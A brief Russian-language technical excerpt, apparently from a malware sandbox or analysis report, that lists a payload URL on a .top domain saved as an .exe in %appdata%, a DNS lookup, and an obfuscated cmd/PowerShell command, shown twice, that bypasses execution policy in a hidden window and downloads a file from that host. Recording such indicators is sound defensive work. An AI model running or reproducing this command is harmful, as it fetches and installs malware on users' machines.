Техническая информация
- http://www.fopeioaas.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^oWer^shel^L.e^X^E -eX^ecut^IoNPOlIcY BY^pas^s^ -N^opr^OfILe -^W^InDOws^tY^LE hIdD^En (^neW-^ob^jeCt^ ^systeM^.nET.we^BCLIEnT)^.DO^w^Nl^Oad^fIl^e('http://www.fopeioaas.top/...
- DNS ASK fo###oaas.top
- '<SYSTEM32>\cmd.exe' /C "P^oWer^shel^L.e^X^E -eX^ecut^IoNPOlIcY BY^pas^s^ -N^opr^OfILe -^W^InDOws^tY^LE hIdD^En (^neW-^ob^jeCt^ ^systeM^.nET.we^BCLIEnT)^.DO^w^Nl^Oad^fIl^e('http://www.fopeioaas.top/...' (со скрытым окном)